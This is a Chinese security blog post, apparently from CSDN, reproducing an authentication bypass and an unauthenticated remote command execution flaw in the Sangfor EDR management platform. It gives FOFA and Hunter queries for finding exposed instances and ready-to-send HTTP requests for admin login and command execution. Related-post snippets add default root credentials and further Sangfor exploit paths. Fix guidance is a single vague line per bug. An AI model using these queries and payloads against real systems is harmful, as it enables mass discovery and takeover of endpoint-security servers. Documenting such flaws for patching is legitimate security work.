记某信漏洞复现

原创 已于 2023-10-17 11:57:48 修改 · 286 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #网络安全 #web安全

于 2023-10-12 15:55:53 首次发布
本文揭示了SANGFOR终端检测响应平台存在的登录绕过漏洞和命令执行漏洞,通过示例展示了漏洞复现方法,并强调了鉴权修复的重要性。提供了一份针对这些问题的修复方案和渗透测试资源链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

深信服-SANGFOR终端检测响应平台漏洞复现

通常访问的页面如下,存在登录框

信息收集

FOFA语法
  1. title="SANGFOR终端检测响应平台"

需重点关注框框的图标,可以聚焦资产搜索
  1. icon_hash="1307354852"

鹰图搜索
  1. web.title="SANGFOR终端检测响应平台"

可聚焦资产
  1. web.icon=="68e28d49856759ddeb91b6be3d6f7e42"

SANGFOR终端检测响应平台 - 任意用户免密登录

漏洞复现

路由后拼接/ui/login.php?user={{需要登录的用户名}}

这边以admin权限用户为例
  1. GET /ui/login.php?user=admin HTTP/1.1
  2. Host: {{Hostname}}

访问之后会像这样直接进入后台

修复方案

该类逻辑漏洞的起因往往与鉴权有关,需做好权限校验

SANGFOR终端检测响应平台 - 前台RCE

同一套系统

漏洞复现

路由后拼接/tool/log/c.php?strip_slashes=system&host={执行的命令}

命令执行以id为例
  1. GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
  2. Host: {{Hostname}}

大致页面如下所示

修复方案

该目录代码层面的逻辑问题,需要进行鉴权以及重写等处理

                             hack渗透视频教程,扫码免费领

 

服数据中心管理系统 XXE漏洞复现
0xSec
08-16 2782
服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感息。
漏洞复现】某厂商NGAF防火墙任意文件读取漏洞
晚风不及你
02-29 1505
服下一代防火墙NGAF专注网络边界安全效果,通过应用丰富的安全创新防御技术和简单易用的产品设计理念,不仅增强网络边界的安全检测与防控能力,而且实现网络安全风险可视化展示与快速处置,让组织网络边界安全建设更有效、更简单。
服应用交付报表任意文件读取漏洞
剁椒鱼头没剁椒的博客
02-10 2272
服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。
sangfor EDR漏洞(CNVD-2020-46552)复现
bigblue00的博客
09-06 4559
声名:本项目仅用于测试工作和学习交流使用。 请使用者遵守当地相关法律,勿用于非授权测试,如作他用所承受的法律责任一概与本人无关!!! 深服EDR远程命令执行漏洞影响版本:v3.2.16,3.2.17,3.2.19 本次测试环境搭建:EDR 3.2.19 ,kali(kali和EDR 3.2.19同在一个网段) 登录EDR账号:root 密码:edr@sangfor 查看ip 复现过程 1、任意用户登录 payload: https://ip地址/ui/login.php?user=任意用户名 例:ht
服行为感知系统和终端检测响应平台EDR REC复现渗透测试
kelenwait的博客
06-24 1983
简介 深服行为感知系统和终端检测响应平台EDR是深服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行。 漏洞影响 深服EDR 3.2.16 深服EDR 3.2.17 深服EDR 3.2.19 深服 行为感知系统 漏洞复现 登录界面 c.php 远程命令执行漏洞 使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l
漏洞复现】挂号系统-SQL注入-login
知黑而守白
07-05 265
挂号系统是医疗服务中不可或缺的一部分,旨在提高就医效率和优化资源配置。该系统通过线上或线下方式,如互联网、自助挂号机、电话等,为患者提供便捷的挂号服务。患者或家属可以随时随地预约挂号,节省了大量时间和精力。同时,挂号系统还提供了医生的排班息、号源情况等,使患者能够更清楚地了解医疗资源情况。此外,挂号系统还采用了多种技术手段,如指纹识别、生物特征匹配等,以抑制非法倒号行为,保护患者的合法权益。总之,挂号系统是医疗服务息化、智能化的重要体现,为患者提供了更加便捷、高效的医疗服务。
漏洞复现】H5云商城-任意文件上传-file
最新发布
知黑而守白
07-10 135
H5 云商城是一个基于 H5 技术的电子商务平台,旨在为用户提供方便快捷的在线购物体验。多平台适配:H5 云商城采用 H5 技术开发,具有良好的跨平台适配性。无论是在电脑、手机还是平板等设备上,用户都可以通过网页浏览器访问和使用云商城,无需安装额外的应用程序。由于H5 云商城 /admin/commodtiy/ 接口商品图片上传处,没有对用户传入的文件进行校验和过滤判断,导致未经身份验证的远程攻击者可直接上传恶意后门文件,执行恶意代码,获取服务器权限。
漏洞复现】指挥调度平台-SQL注入-ajax_users
知黑而守白
07-10 156
福建科立讯通指挥调度管理平台是一个专门针对通行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。福建科立迅通指挥调度平台某接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改录,导致数据损坏或丢失。
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6403
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户息、查询订单...
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-18 862
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
SANGFOR_AD7.0.3_双机配置指导.pdf
03-23
SANGFOR_AD7.0.3_双机配置指导 深网络设备 相关配置文档
服应用交付报表系统 命令执行漏洞复现
09-28 2497
服应用交付报表系统是深服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。该系统能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、链路以及服务。
Sangfor华东天勇战队:h2数据库console命令执行( CVE-2021-42392 漏洞
bring_coco的博客
06-26 1569
通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.naming.Context出问题的。可以看到class javax.naming.InitialContext是javax.naming.Contex的子类,因此进入if。根据调用栈顺序,我们进入到org.h2.server.web.WebServer#getConnection方法,如下。进入org.h2.server.web.WebApp#process方法。
服EDR终端检测平台-RCE漏洞复现
thelostworld
08-18 2343
​昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE 自己也来看看。 简介: EDR简介(来自官方): 终端检测响应平台(EDR)是深服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据息采集上报、一键处置等。深
技术分享 | 某下一代防火墙远程命令执行漏洞分析及防护绕过
m0_46699477的博客
10-26 2277
在本文中,我们对某下一代防火墙的命令执行漏洞进行了分析,并发现了命令执行无回显等限制。
服 应用交付报表系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-04 1383
服 应用交付报表系统 download.php 任意文件读取漏洞
服PHP,深服终端检测响应平台 EDR 代码审计
weixin_30089411的博客
03-19 2617
今年 HW 深服的 EDR 爆出了一些很低级的漏洞,也看到网上不少人再吐槽,国光也忍不住来分析复现看看。基本配置息网上地下流传的深服的 EDR ISO 文件实际上是 CentOS7 镜像,下面国光简单分享录一下相关息,然后面看到的朋友少走弯路。首先 ISO 安装的话,不要使用快速安装,直接挂载即可,相关的账号密码为:用户名密码rootedr@sangfor安装完成默认是静态 IP,得配置...
服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
weixin_46801402的博客
11-04 3211
服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值